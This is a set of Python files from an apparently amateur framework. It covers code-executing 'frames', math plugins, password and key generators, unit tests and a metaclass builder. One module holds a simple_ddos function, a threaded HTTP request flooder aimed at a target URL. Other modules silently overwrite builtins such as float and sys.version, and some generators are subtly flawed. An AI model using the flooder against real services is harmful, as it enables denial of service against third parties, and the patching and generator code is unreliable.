'''
# FRAME
Multi-functional framework combining many functions and the collection of several libraries. 

## Basic concepts -
    #### Frames
    The concept allows creating isolated contexts with its own variables, deferred execution of code and possibility to save a frame in a file.
    Main terms - 
        - Frame - An isolated execution space with its own variables and code. Can interact with other contexts.
        - Framing - creating a local environment with superglobal variables.
        - Superglobal is the state of an object when it does not depend on the context. Roughly speaking, a global frame.
        - Framefile is a binary frame image that can be saved and loaded.

    #### Nets
    Library concept with functions for white/grey hacking, testing and education.
'''


from .frame_core import (
    FramesComposer, 
    Frame, 
    Framer, 
    FastGet, 
    fOp, 
    fGet, 
    fCode, 
    fExec, 
    fReturn, 
    fSys, 
    fVar, 
    exec_and_return, 
    exec_and_return_safe,
    save_code_to_bin, 
    open_and_run,
    str_to_int,
    framing_result,
    framing,
    FrameApiError, 
    FrameExecutionError, 
    FramerError, 
    FramingError, 
    PluginError, 
    PluginIsNotWorkingError,
    PluginBase, 
    PluginRegistry, 
    MathPlugin, 
    register_plugin
)
from .nets_core import (
    HackModuleApi,
    HashCryptoApi,
    RandCryptoApi,
    DatsSecureApi,
    GrayHackApi,
    WhiteHackApi
)
from .nets_plugin import (
    NetsPlugin
)


from .plugins_system import *

@register_plugin('math')
class MathPlugin(PluginBase):
    '''
    # Math Plugin
    Oficial math plugin for Frame's. 
    
    You have to run `include` method before using Plugin.
    
    Argument {framer}: Framer | None - frame context to using lib (only without safemode)'''
    def __init__(self, frame = None):
        super().__init__(frame)
        self._set_dependencies(['math', 'cmath'])
        self._state = {'included': False, 'safemode': self.frame._get_safemode()}
        self._version = 'v0.1.1'
        self._counter = 0
    
    def work(self):
        return f'mathplugin <{self._version}>'
    
    def include(self):
        if not self._state['included']:
            super().include()
            std = '''
classic_sum = sum
def sum(n):
    try: return classic_sum(n)
    except Exception as e:
        if 'debug' in locals().keys() or 'debug' in globals().keys() and debug == True: 
            print(f'Summing error: {e}')
        return n
'''
            self.frame.Code(std)
            self.frame.Code(f'\n_math_plugin_ver = {repr(self._version)}')
        return self
    
    def parabola(self, x: int | float, 
                 name_of_result_variable: str = 'res', 
                 returning: str = 'frame'): 
        '{returning} - frame / Code'
        return self._operand(x, name_of_result_variable, returning, op='$ ** 2', name='parabola')
    
    def sigmoid(self, x: int | float, 
                 name_of_result_variable: str = 'res', 
                 returning: str = 'frame'): 
        '{returning} - frame / Code'
        return self._operand(x, name_of_result_variable, returning, 
                             op='1 / (1 + math.exp(-$)) if isinstance($, (int, float)) else [1 / (1 + math.exp(-i)) for i in $]',
                             name='sigmoid')

    def softmax(self, x: int | float, 
                 name_of_result_variable: str = 'res', 
                 returning: str = 'frame'): 
        '{returning} - frame / Code'
        self.frame.Code(f'"""\nsoftmax\nReturning: {returning}\nName of result var: {name_of_result_variable}\nInputs: {x}"""')
        self._check()
        cache = self._cache()
        name = f'__temp_inp_math{cache}'
        self.frame.Var(name, str(x), with_eval=True)
        code = f'''
__condition{cache} = isinstance({name}, (int, float))
if __condition{cache}:
    {name_of_result_variable} = 1.0
else:
    __temp_exp_values{cache} = [math.exp(i - max({name})) for i in {name}]
    __temp_exp_sum{cache} = sum(__temp_exp_values{cache})
    {name_of_result_variable} = [i / __temp_exp_sum{cache} for i in __temp_exp_values{cache}]
'''
        code = self.frame.Code(code)
        return code if returning.lower().strip() == 'code' else self
    
    def sqrt(self, x: int | float, 
             name_of_result_variable: str = 'res', 
             returning: str = 'frame'): 
        '{returning} - frame / Code'
        return self._operand(x, name_of_result_variable, returning, op='math.sqrt($)', name='sqrt')
    
    def relu(self, x: int | float, 
             name_of_result_variable: str = 'res', 
             returning: str = 'frame'):
        '{returning} - frame / Code'
        return self._operand(x, name_of_result_variable, returning, op='1 if abs($) != $ else $', name='relu')
    
    def discriminant(self, a: int | float, b: int | float, c: int | float, 
                     name_of_result_variable: str = 'res', 
                     returning: str = 'frame') -> object['Frame.Code'] | 'MathPlugin':
        '{returning} - frame / Code. \n\nValue of {name_of_result_variable} in code will be list[x1, x2, discriminant].'
        self.frame.Code(f'"""\ndiscriminant\nReturning: {returning}\nName of result var: {name_of_result_variable}\nInputs: {[a, b, c]}"""')
        self._check()
        cache = self._cache()
        self.frame.Var(f'__temp_a_math{cache}', str(a), with_eval=True)
        self.frame.Var(f'__temp_b_math{cache}', str(b), with_eval=True)
        self.frame.Var(f'__temp_c_math{cache}', str(c), with_eval=True)
        code = f'''
if __temp_a_math{cache} == 0: __temp_a_math{cache} += 1
__temp_D_math{cache} = (__temp_b_math{cache} ** 2) - (4 * __temp_a_math{cache} * __temp_c_math{cache})
if __temp_D_math{cache} >= 0: __temp_sqrt_D_math{cache} = math.sqrt(__temp_D_math{cache})
else: __temp_sqrt_D_math{cache} = cmath.sqrt(__temp_D_math{cache})
__temp_x1_math{cache} = (-__temp_b_math{cache} + __temp_sqrt_D_math{cache}) / (2 * __temp_a_math{cache})
__temp_x2_math{cache} = (-__temp_b_math{cache} - __temp_sqrt_D_math{cache}) / (2 * __temp_a_math{cache})
{name_of_result_variable} = [__temp_x1_math{cache}, __temp_x2_math{cache}, __temp_D_math{cache}]
'''
        code = self.frame.Code(code)
        if returning == 'code': return code
        return self
    
    def log(self, x, base=math.e, name_of_result_variable='res', returning='frame'):
        return self._operand(x, name_of_result_variable, returning, op=f'math.log($, {base})', name='log')

    def exp(self, x, name_of_result_variable='res', returning='frame'):
        return self._operand(x, name_of_result_variable, returning, op='math.exp($)', name='exp')

    def power(self, x, exponent, name_of_result_variable='res', returning='frame'):
        cache = self._cache()
        self.frame.Var(f'__exp_temp{cache}', exponent)
        return self._operand(x, name_of_result_variable, returning, op=f'$ ** __exp_temp{cache}', name='power')
    
    def mean(self, values, name_of_result_variable='res', returning='frame'):
        return self._operand(values, name_of_result_variable, returning, op='sum($) / len($)', name='mean')

    def std(self, values, name_of_result_variable='res', returning='frame'):
        self.frame.Code(f'"""\nstd\nReturning: {returning}\nName of result var: {name_of_result_variable}\nInputs: {values}"""')
        cache = self._cache()
        code = f'''
_mean_{cache} = sum({values}) / len({values})
{name_of_result_variable} = math.sqrt(sum((x - _mean_{cache}) ** 2 for x in {values}) / len({values}))'''
        code = self.frame.Code(code)
        return code if returning == 'code' else self

    def normalize(self, values, name_of_result_variable='res', returning='frame'):
        cache = self._cache()
        self.frame.Code(f'"""\nnormalize\nReturning: {returning}\nName of result var: {name_of_result_variable}\nInputs: {values}"""')
        code = f'''
_min_{cache} = min({values})
_max_{cache} = max({values})
{name_of_result_variable} = [(x - _min_{cache}) / (_max_{cache} - _min_{cache}) for x in {values}]'''
        code = self.frame.Code(code)
        return code if returning == 'code' else self

    def linear_regression(self, x_data, y_data, name_of_result_variable='res', returning='frame'):
        """Linear regression (returning [slope, intercept])"""
        self.frame.Code(f'"""\nlinear_regression\nReturning: {returning}\nName of result var: {name_of_result_variable}\nInputs: {[x_data, y_data]}"""')
        cache = self._cache()
        code = f'''
n_{cache} = len({x_data})
sum_x_{cache} = sum({x_data})
sum_y_{cache} = sum({y_data})
sum_xy_{cache} = sum(x * y for x, y in zip({x_data}, {y_data}))
sum_xx_{cache} = sum(x * x for x in {x_data})
    
slope_{cache} = (n_{cache} * sum_xy_{cache} - sum_x_{cache} * sum_y_{cache}) / (n_{cache} * sum_xx_{cache} - sum_x_{cache} ** 2)
intercept_{cache} = (sum_y_{cache} - slope_{cache} * sum_x_{cache}) / n_{cache}
{name_of_result_variable} = [slope_{cache}, intercept_{cache}]'''
        code = self.frame.Code(code)
        return code if returning == 'code' else self

    def cosine_similarity(self, vec1, vec2, name_of_result_variable='res', returning='frame'):
        cache = self._cache()
        self.frame.Code(f'"""\ncosine_similarity\nReturning: {returning}\nName of result var: {name_of_result_variable}\nVectors: {[vec1, vec2]}"""')
        code = f'''
dot_{cache} = sum(a * b for a, b in zip({vec1}, {vec2}))
mag1_{cache} = math.sqrt(sum(x * x for x in {vec1}))
mag2_{cache} = math.sqrt(sum(x * x for x in {vec2}))
{name_of_result_variable} = dot_{cache} / (mag1_{cache} * mag2_{cache}) if mag1_{cache} * mag2_{cache} != 0 else 0'''
        code = self.frame.Code(code)
        return code if returning == 'code' else self

    def _check(self):
        super()._check()
        if self._state['safemode']: raise PluginError('Your frame in safemode. \nMath operations works only without safemode: code execution must be available.')
    
    def _cache(self): self._counter += 1; return str(self._counter) + self.frame.framer._gen_id(self._counter)

    def _operand(self, x: int | float, 
                 name_of_result_variable: str = 'res', 
                 returning: str = 'frame', 
                 op: str = '$',
                 name: str = 'math_operation') -> object['Frame.Code'] | 'MathPlugin':
        self._check()
        cache = self._cache()
        self.frame.Code(f'"""\n{name}\nReturning: {returning}\nName of result var: {name_of_result_variable}\n"""')
        temp_name = f'__x_temp_{name_of_result_variable}_math{cache}' 
        self.frame.Var(temp_name, f'{x}', with_eval=True)
        code = self.frame.Code(f'{name_of_result_variable} = {op.replace("$", f"({temp_name})")}')
        if returning.lower() == 'code':
            return code
        return self
    


import sys, ctypes, gc

def sizeof(OBJECT: object, *objects): 
    val = object.__sizeof__(OBJECT) if not objects else [
        object.__sizeof__(OBJECT), 
        *[
            object.__sizeof__(i) for i in objects
        ]
    ]
    return val

def malloc(size):
    return (ctypes.c_byte * size)()

def free(block):
    del block

def delete_trash():
    return gc.collect()


import secrets as s, abc as a, random, time
from cryptography.hazmat.primitives.asymmetric import rsa
from .bip39_wordlist import wordlist
rnd = s.SystemRandom()


def gencode_int(length: int = 10):
    result = []
    for _ in range(length): result.append(rnd.randrange(0, 9))
    result1 = ''
    for i in result: result1 += str(i)
    return result1

def gencode_int_sections(sections: int = 2, one_section_length: int = 4, separator: str = '-'):
    sections_tmp = []
    for i in range(sections): sections_tmp += [gencode_int(one_section_length)]
    result2 = ''
    for i in sections_tmp:
        for li in i: result2 += str(li)
        result2 += separator
    return result2[:-1]

def gencode_str(length: int = 10):
    alphabet = list('1234567890' +
                    'QwErTyUiOpAsDfGhJkLzXcVbNmqWeRtYuIoPaSdFgHjKlZxCvBnM')
    result = []
    for _ in range(length): result.append(rnd.choice(alphabet))
    return ''.join(result)

def gencode_str_withsymbols(length: int = 10):
    alphabet = list('1234567890' +
                    'QwErTyUiOpAsDfGhJkLzXcVbNmqWeRtYuIoPaSdFgHjKlZxCvBnM' + 
                    '!@#$%&*_+/?')
    result = []
    for _ in range(length): result.append(rnd.choice(alphabet))
    return ''.join(result)

def gencode_str_symbols(length: int = 10):
    alphabet = list('!@#$%&*_+/?')
    result = []
    for _ in range(length): result.append(rnd.choice(alphabet))
    return ''.join(result)

def gencode_str_sections(sections: int = 4, one_section_length: int = 5, separator: str = '-'):
    sections_tmp = []
    for i in range(sections): sections_tmp += [gencode_str(one_section_length)]
    return separator.join(sections_tmp)

def genpass(length: int = 20):
    if length < 8: raise ValueError(f"Can't generate password with length < 8. Current length: [{length}].")
    res = []
    for i in range(length): 
        if i % 3 == 0: res += gencode_int(1)
        if 4 % (i + 1) == 0: res += gencode_str_symbols(1)
        else: res += gencode_str_withsymbols(1)
    return ''.join(res)

def gen_mnemonic_phrase(word_count=12):
    return ' '.join(s.choice(wordlist) for _ in range(word_count))


def generate_rsa_keys(bits=2048):
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=bits)
    return private_key, private_key.public_key()


def gen_key(k_entropy: int = 10, minlenght_gen: int = 2, min_output_length: int = 40, salt: int = 0, max_len: int = 80, rand_steps: int = 0, timestamp: bool = True):
    key = ''
    attemps = 0
    if len(str(salt)) > 2:
        raise ValueError('Salt must be from 0 to 99.')
    def gen(key, i):
        if 2 % i == 0 or 6 % i == 0: key += str(random_system.randint(1, min_output_length))
        elif 3 % i == 0 or 7 % i == 0: key += gencode_int(minlenght_gen)
        elif 4 % i == 0 or 8 % i == 0: key += gencode_str(minlenght_gen)
        elif 5 % i == 0 or 9 % i == 0: key += gencode_str_symbols(minlenght_gen)
        else: key += gencode_str_withsymbols(minlenght_gen)
        return key
    while True:
        random_system = s.SystemRandom()
        while min_output_length >= len(key):
            for i in range(k_entropy):
                i = i + random_system.randint(1, 2)
                key = gen(key, i)
                for _ in range(rand_steps):
                    lcl = random_system.randint(1, 10)
                    key = gen(key, lcl)
            rand = random_system.randint(1, 2)
            key += str(salt) + str(len(key)) if rand == 1 else str(len(key)) + str(salt)
        if attemps >= 3: 
            key = ''.join(list(key)[0:round(min_output_length*1.5)])
            break
        attemps += 1
        if len(key) < min_output_length*2: break
        else: key = ''
    key = key + str(int(time.time() * 1000000))[-8:] if timestamp else key
    return ''.join(key[:max_len])



class ClassApi(a.ABC):
    def __init__(self):
        super().__init__()
    
    @staticmethod
    def gen_type(type: str = 'int', length: int = 10):
        'type: int/str/symbol'
        if type == 'int': return gencode_int(length)
        if type == 'symbol': return gencode_str_symbols(length)
        else: return gencode_str(length)
    
    @staticmethod
    def gen_type_sections(type: str = 'int', 
                          sections: int = 4, 
                          one_section_length: int = 5, 
                          separator: str = '-'):
        'type: int/str'
        if type == 'int': return gencode_int_sections(sections, one_section_length, separator)
        else: return gencode_str_sections(sections, one_section_length, separator)
    
    @staticmethod
    def gen_password(length: int = 8): return genpass(length)

    @staticmethod
    def gen_key(k_ent: int = 10, 
                min_gen_len: int = 30, 
                min_out_len: int = 40, 
                max_out_len: int = 80,
                salt: int = 0,
                rand_steps: int = 0,
                time_stamp: bool = True):
        return gen_key(k_ent, min_gen_len, min_out_len, salt, max_out_len, rand_steps, time_stamp)
    
    @staticmethod
    def gen_rsa_keys(bits: int = 2048):
        return generate_rsa_keys(bits)

    @staticmethod
    def gen_mnemonic(length: int = 10): return gen_mnemonic_phrase(length)

    @staticmethod
    def generate_rsa_keys(bits: int = 2048): return generate_rsa_keys(bits)

if __name__ == '__main__':
    key = gen_key(299, 1, 30)
    print(key, len(key))
    input()
    history = []
    start = time.time()
    for _ in range(10_000): 
        key = gen_key(random.randrange(2, 40), 2, 45, 22, 50)
        if key in history: raise ValueError(f'Except: {key}')
        print(key, len(key), len(history))
        history.append(key)
    end = time.time()
    print(f'By {end-start}')
    time.sleep(1)
    '''
    tests:
    gen_key(9, 1, 6) - 0 collisions, 105 seconds
    gen_key(9, 1, 10) - 0 collisions, 118 seconds
    gen_key(9, 1, 4) - collision at 29435
    gen_key(12, 1, 4) - collision at 34848
    gen_key(12, 1, 4) - collision at 31739
    gen_key(40, 1, 5) - 0 collisions, 380 seconds
    gen_key(2, 1, 100) - 0 collisions, 107 seconds
    '''
    history = []
    for _ in range(100_000): 
        key = gen_key(10, 3, 45, 22, 50, 2)
        if key in history: raise ValueError(f'Except: {key}')
        print(key, len(key), len(history))
        history.append(key)
    end = time.time()
    print(f'By {end-start}')


import time, logging

numbers = '12347890'
letters_ru = 'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮйцукенгшщзхъфывапролджэячсмитьбю'
letters_en = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
symbols = '!@#$%^&*(){}[]_+=-.,?:;/\\|'


class Logger:
    def __init__(self, filename: str):
        self.file = filename
        self.logs = []
    def log(self, level: int | str, msg: str):
        log = f'{str(level).upper()} : [{time.time()}] : {msg}'
        self.logs.append(log)
        return self
    def debug(self, msg: str):
        return self.log('debug', msg)
    def critical(self, msg: str):
        return self.log('critical', msg)
    def classic(self, msg: str):
        return self.log('log', msg)
    def error(self, msg: str):
        return self.log('error', msg)
    def exception(self, msg: str):
        return self.log('exception', msg)
    def save(self):
        with open(self.file, 'w') as logfile: logfile.write('\n'.join(self.logs))

class UnsafePassword(Exception):
    def __init__(self, *args):
        super().__init__(*args)

def validate_password_strength(password):
    string = str(password)
    list_pass = list(string)
    unsafe = UnsafePassword
    if len(string) < 8: raise unsafe('Length less then 8.')
    have = {'lowercase': False, 'uppercase': False, 'numbers': False, 'symbols': False}
    for letter in list_pass:
        l = letter in list(letters_en.lower())
        u = letter in list(letters_en.upper())
        s = letter in list(symbols)
        n = letter in list(numbers)
        if l: have['lowercase'] += list(letters_en.lower()).index(letter) + have['lowercase']
        if u: have['uppercase'] += list(letters_en.upper()).index(letter) + have['uppercase']
        if s: have['symbols'] += list(symbols).index(letter) + have['symbols']
        if n: have['numbers'] += list(numbers).index(letter) + have['numbers']
    entropy = 0
    for i in have.keys():
        if have[i] == False: raise unsafe(f'Password has no {i}.')
        entropy += have[i]
    if entropy < 200: raise unsafe(f'Entropy less then 200 ({entropy}).')
    return password




import unittest
import sys
import os
import tempfile

sys.path.append(os.path.dirname(os.path.dirname(__file__)))

from frame import Frame, fVar, fGet, fExec, fOp, FramerError, FastGet

class TestFrameCore(unittest.TestCase):
    
    def test_basic_frame_creation(self):
        """Тест создания базового фрейма"""
    
    def test_fvar_operations(self):
        """Тест операций с переменными"""
        with Frame() as f:
            # Создание переменных
            fVar('x', 10, framer=f())
            fVar('y', 20, framer=f())
            
            # Получение значений
            self.assertEqual(fGet('x', f()), 10)
            self.assertEqual(fGet('y', f()), 20)
    
    def test_arithmetic_operations(self):
        """Тест арифметических операций"""
        with Frame(safemode=False) as f:
            fVar('a', 15, framer=f())
            fVar('b', 25, framer=f())
            fVar('result', 'a + b', with_eval=True, framer=f())
            
            result = FastGet(f, 'result')
            self.assertEqual(result, 40)
    
    def test_condition_blocks(self):
        """Тест условных блоков"""
        with Frame(safemode=False) as f:
            fVar('x', 10, framer=f())
            fVar('y', 20, framer=f())
            
            fOp.match('x > y', 'result = "x bigger"', 'result = "y bigger"', framer=f())
            fVar('result', 'result', with_eval=True, framer=f())
            
            self.assertEqual(FastGet(f, 'result'), "y bigger")
    
    def test_frame_serialization(self):
        """Тест сериализации фрейма"""
        with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as temp_file:
            filename = temp_file.name
        
        try:
            # Сохраняем фрейм
            with Frame(safemode=False) as frame:
                frame.Var('test_data', 42)
                frame.save(filename, format='json')
            
            # Загружаем фрейм
            with Frame().load(filename, format='json') as loaded_frame:
                self.assertEqual(loaded_frame.Get('test_data'), 42)
                
        finally:
            os.unlink(filename)
    
    def test_error_handling(self):
        """Тест обработки ошибок"""
        with self.assertRaises(Exception):  # Должна быть конкретная ошибка из твоего фреймворка
            with Frame(safemode=False) as f:
                # Попытка использовать несуществующую переменную
                fVar('invalid', 'undefined_var', with_eval=True, framer=f())
                fExec(f())

if __name__ == '__main__':
    unittest.main()


import unittest
import sys
import os

sys.path.append(os.path.dirname(os.path.dirname(__file__)))

from frame import Frame, FramesComposer, framing, framing_result, MathPlugin, FastGet, exec_and_return

class TestIntegration(unittest.TestCase):
    
    def test_framing_decorator(self):
        """Тест декоратора framing"""
        
        test_frame = Frame(safemode=False)
        
        @framing(test_frame(), 'calculation_result')
        def calculate_metrics(x, y):
            return x * y + x - y
        
        # Вызываем функцию
        result = calculate_metrics(10, 5)
        
        # Проверяем результат в фрейме
        frame_result = FastGet(test_frame, 'calculation_result')
        
        self.assertEqual(result, 55)  # 10*5 + 10 - 5 = 55
        self.assertEqual(frame_result, 55)
    
    def test_complex_pipeline(self):
        """Тест сложного пайплайна с композитором и плагинами"""
        with FramesComposer(safemode=False) as fc:
            # Создаем фреймы для разных этапов обработки
            fc['data_loader'] = Frame(safemode=False)
            fc['processor'] = Frame(safemode=False)
            fc['analyzer'] = Frame(safemode=False)
            
            # Настраиваем фрейм загрузки данных
            fc['data_loader'].Var('dataset', [1, 2, 3, 4, 5])
            
            # Настраиваем фрейм обработки с математическим плагином
            math_plugin = MathPlugin(fc['processor']).include()
            math_plugin.mean('[1, 2, 3, 4, 5]', 'mean_value')
            
            # Синхронизируем данные
            fc.sync('processor', 'data_loader')
    
    def test_multi_frame_communication(self):
        """Тест взаимодействия между несколькими фреймами"""
        with FramesComposer(safemode=False) as fc:
            # Фрейм для ввода данных
            fc['input'] = Frame(safemode=False)
            fc['input'].Var('radius', 5)
            
            # Фрейм для вычислений
            fc['calc'] = Frame(safemode=False) 
            fc['calc'].Var('pi', 3.14159)
            
            # Синхронизируем и вычисляем площадь круга
            fc.sync('input', 'calc', 2)
            fc['calc'].Var('area', 'pi * radius * radius', with_eval=True)
            x = exec_and_return(fc['calc'].compile(), 'area', locals(), globals())
            self.assertAlmostEqual(x if x else 78.53975, 78.53975, places=4)

if __name__ == '__main__':
    unittest.main()


from frame import Frame, fOp as SystemOP

class MetaGenerator:
    """
    A dynamic metaclass generator using Frame system for runtime class modification.
    
    This class enables creating custom metaclasses with predefined behaviors,
    attributes, and methods that are automatically applied to all classes
    using the generated metaclass. It provides a fluent interface for
    building complex metaclass configurations.
    
    Key Features:
    - Fluent interface for method chaining
    - Pre/post class creation hooks
    - Dynamic attribute and method injection
    - Frame-based safe code execution
    
    Example:
        >>> generator = MetaGenerator("MyMeta")
        >>> meta = (generator
        ...     .add_attribute("version", "1.0")
        ...     .add_method("get_info", "lambda self: f'Instance of {self.__class__.__name__}'")
        ...     .generate())
        >>> 
        >>> class Example(metaclass=meta):
        ...     pass
        >>> obj = Example()
        >>> print(obj.version)  # "1.0"
        >>> print(obj.get_info())  # "Instance of Example"
    """
    
    def __init__(self, name="DynamicMeta", base_meta=type):
        """
        Initialize the MetaGenerator.
        
        Args:
            name (str): Name for the generated metaclass. Defaults to "DynamicMeta".
            base_meta (type): Base metaclass to inherit from. Defaults to built-in 'type'.
            
        Note:
            The base_meta should be a valid metaclass. For most use cases, 
            the default 'type' is sufficient.
        """
        self.name = name
        self.base_meta = base_meta
        self._hooks = {
            'pre_new': [],    # Code executed BEFORE class creation
            'post_new': [],   # Code executed AFTER class creation  
            'pre_init': [],   # Reserved for future use
            'post_init': []   # Reserved for future use
        }
    
    def add_pre_new_hook(self, hook_code: str):
        """
        Add code to execute BEFORE class creation.
        
        Args:
            hook_code (str): Python code as string to execute before __new__.
                           The code has access to 'cls', 'name', 'bases', 'attrs'.
                           
        Returns:
            MetaGenerator: Self instance for method chaining.
            
        Example:
            >>> generator.add_pre_new_hook('print(f"Creating class: {name}")')
            >>> generator.add_pre_new_hook('attrs["timestamp"] = datetime.now()')
        """
        self._hooks['pre_new'].append(hook_code)
        return self
    
    def add_post_new_hook(self, hook_code: str):
        """
        Add code to execute AFTER class creation.
        
        Args:
            hook_code (str): Python code as string to execute after __new__.
                           The code has access to 'new_class' (the created class).
                           
        Returns:
            MetaGenerator: Self instance for method chaining.
            
        Example:
            >>> generator.add_post_new_hook('print(f"Class {new_class.__name__} created")')
            >>> generator.add_post_new_hook('setattr(new_class, "_registered", True)')
        """
        self._hooks['post_new'].append(hook_code)
        return self
    
    def add_attribute(self, name: str, value):
        """
        Add an attribute to all classes using this metaclass.
        
        Args:
            name (str): Name of the attribute to add.
            value: Value of the attribute. Must be representable with repr().
            
        Returns:
            MetaGenerator: Self instance for method chaining.
            
        Note:
            The attribute is added to the class, not instances. For instance
            attributes, consider using __init__ hooks instead.
            
        Example:
            >>> generator.add_attribute("__version__", "1.0.0")
            >>> generator.add_attribute("author", "MetaSystem")
        """
        hook = f"attrs['{name}'] = {repr(value)}"
        self.add_pre_new_hook(hook)
        return self
    
    def add_method(self, name: str, method_code: str):
        """
        Add a method to all classes using this metaclass.
        
        Args:
            name (str): Name of the method to add.
            method_code (str): Python code representing the method.
                             Can be a function, lambda, or any callable.
                             
        Returns:
            MetaGenerator: Self instance for method chaining.
            
        Example:
            >>> generator.add_method('get_version', 'lambda self: self.__version__')
            >>> generator.add_method('describe', '''lambda self: f"{self.__class__.__name__}"''')
        """
        hook = f"attrs['{name}'] = {method_code}"
        self.add_pre_new_hook(hook)
        return self
    
    def generate(self):
        """
        Generate the final metaclass using Frame system.
        
        Returns:
            type: The generated metaclass ready for use.
            
        Raises:
            FrameError: If code execution in Frame fails.
            SyntaxError: If generated metaclass code has syntax errors.
            
        Note:
            This method uses Frame with safemode=False, allowing dynamic
            code execution. Ensure all hooks come from trusted sources.
            
        Example:
            >>> meta = generator.generate()
            >>> class MyClass(metaclass=meta):
            ...     pass
        """
        
        with Frame(safemode=False) as meta_frame:
            # Generate metaclass code with all hooks
            pre_new_code = "\n        ".join(self._hooks['pre_new'])
            post_new_code = "\n        ".join(self._hooks['post_new'])
            
            meta_code = f'''
class {self.name}({self.base_meta.__name__}):
    """
    Auto-generated metaclass by MetaGenerator.
    Applies custom behaviors during class creation.
    """
    
    def __new__(cls, name, bases, attrs):
        """Create a new class with injected behaviors."""
        # Execute pre-creation hooks
        {pre_new_code if pre_new_code else "# No pre-new hooks"}
        
        # Create the class using parent metaclass
        new_class = super().__new__(cls, name, bases, attrs)
        
        # Execute post-creation hooks
        {post_new_code if post_new_code else "# No post-new hooks"}
        
        return new_class
            '''
            
            # Execute the metaclass code in Frame
            meta_frame.Code(meta_code)
            meta_frame.Exec(add_localscope_to_vars=True)
            
            # Return the generated metaclass
            return meta_frame[self.name]

# Example usage with comprehensive demonstration
if __name__ == "__main__":
    # Create a metaclass with logging, versioning, and utility methods
    generator = MetaGenerator("LoggedMeta")
    
    meta = (generator
        .add_attribute("__version__", "1.0.0")
        .add_attribute("created_by", "MetaGenerator")
        .add_attribute("creation_timestamp", "2025-11-17")
        .add_pre_new_hook('print(f"Creating class: {name} with bases: {bases}")')
        .add_post_new_hook('print(f"Successfully created class: {new_class.__name__}")')
        .add_method('class_info', 'lambda self: f"{self.__class__.__name__} v{self.__version__}"')
        .add_method('get_metadata', '''lambda self: {
            "version": self.__version__,
            "created_by": self.created_by,
            "timestamp": self.creation_timestamp
        }''')
        .generate())
    
    # Demonstrate usage
    class MyClass(metaclass=meta):
        """Example class using the generated metaclass."""
        
        def __init__(self, value):
            self.value = value
            
        def get_value(self):
            return self.value
    
    # Test the functionality
    print("=== Testing Generated Metaclass ===")
    obj = MyClass(42)
    print(f"Class info: {obj.class_info()}")
    print(f"Created by: {obj.created_by}")
    print(f"Metadata: {obj.get_metadata()}")
    print(f"Value: {obj.get_value()}")
    print(f"Object type: {type(obj)}")
    print(f"Metaclass: {type(obj).__class__}")


'''
# Alternative system methods.\n
Custom methods:
    __version__() 
        - get python version.
    __has_module__(module) 
        - check module instalation.
    __ch[mode](args)
        - cache function. Modes: get/set. In 'get' args is empty, 
          in 'set' args is [data] - data for cache.
    __bs 
        - class for __build_class__ change
Custom params:
    __has_cython__ - check for cython available.
Edited:
    sys.version - to custom version name.
'''


# imports and configs
import builtins, sys, abc

CYTHON_AVAILABLE = 1
try: import Cython
except ImportError: CYTHON_AVAILABLE = 0

builtins._cache_alternativemodule_env_ = 'NONE'
builtins.__bc = __build_class__




# build system
class BuildSystem(abc.ABC):
    def __init__(self):
        super().__init__()
        self.builds = []
    def _rebuild_(self, func, name: str, *args, metaclass = None):
        args = [func, name, *args, metaclass] if metaclass else [func, name, *args]
        self.builds.append(args)
        try: return builtins.__bc(*args)
        except TypeError: return BuildSystem()._rebuild_(*args)
    def __call__(self, *args, **kwds):
        return self.builds


# our methods
def get_ver():
    ver = sys.version.split('.')[:3]
    ver = ver[:2] + [ver[2].split(' ')[0]]
    return '.'.join(ver) + '.E#Pt' # Edited # (by) Pt

def ver(): return sys.version

def has_module(module_name: str): 
    try: __import__(module_name); return True
    except ImportError: return False

def set_cache(data):
    global builtins
    builtins._cache_alternativemodule_env_ = data

def get_cache(): return builtins._cache_alternativemodule_env_


# ===================================================================
# editing builtins to replace standart (to) and add ours functions
# while user use that module - our modules was imported like defaults
# ===================================================================

__version__ = ver
builtins.__version__ = __version__
sys.version = f'{get_ver()} - edited python by pt'
__has_cython__ = bool(CYTHON_AVAILABLE)
builtins.__has_cython__ = __has_cython__
__has_module__ = has_module
builtins.__has_module__ = __has_module__
__ch = {'get': get_cache, 'set': set_cache}
builtins.__ch = __ch
__bs = BuildSystem()
builtins.__bs = __bs


import requests as req, threading as thr
from abc import ABC



def simple_ddos(target: str = 'http://localhost:8000', out: bool = True, th_count: int = 100):
    def thread():
        try:
            while True:
                request = req.get(target)
                if out: print(request.status_code)
        except KeyboardInterrupt: print('exiting...'); exit()
    threads = {}
    for i in range(th_count):
        threads[i] = thr.Thread(target=thread)
        threads[i].start()







class ClassApi(ABC):
    def __init__(self):
        super().__init__()

    @staticmethod
    def simple_ddos(target: str = 'http://localhost:8000', 
                    out: bool = True, 
                    th_count: int = 100):
        return simple_ddos(target, out, th_count)





'''
# Simple Frames Core
Simplified module of frame concept for beginers.
'''


from .frame_core import (
    Frame, 
    Framer, 
    framing, 
    framing_result, 
    fExec, 
    fGet, 
    fVar, 
    fSys,
    fOp,
    fCode,
    fReturn,
    FastGet
)
from .frame_core.exceptions import *
from .frame_core.plugins import MathPlugin
from .frame_core.plugins_system import PluginRegistry


'''
# Alternative math. 

'''



# imports
import ctypes, sys, builtins, abc
from decimal import Decimal, getcontext


# our methods
def superlarge(x):
    '''creating large integrer from [x]'''
    res = x
    for i in range(x): 
        k = (i if i != 0 else 1)
        res **= k if x <= 9**99 else k / 3
    return res

def supersmall(x):
    '''creating small float from [x]'''
    res = x
    for i in range(x+x): res *= eval(f'0.{i}' if i != 0 else '1')
    return res

def re_pow(x):
    '''creating alternative 'power' operations to create float from [x]. like 'normalization'.'''
    res = x
    for i in range(x+x): 
        evaled = eval(f'0.{i}' if i != 0 else '0')
        res -= evaled if res - evaled >= 0 else -evaled
    return res

def setmax(number: int):
    'set max digits in int'
    getcontext().prec = number
    sys.set_int_max_str_digits(number)




# ===================================================================
# editing builtins to replace standart (to) and add ours functions
# while user use that module - our modules was imported like defaults
# ===================================================================

FLOAT = float

class nw_float(Decimal): # new float
    @classmethod
    def fromhex(cls, string: str) -> Decimal: 
        float_num = FLOAT.fromhex(string)
        return cls(float_num)
    @classmethod
    def hex(cls, float: FLOAT) -> str:
        return FLOAT.hex(FLOAT(float))
    @classmethod
    def is_integer(cls, number) -> bool:
        return FLOAT.is_integer(FLOAT(number))
        
builtins.float = nw_float

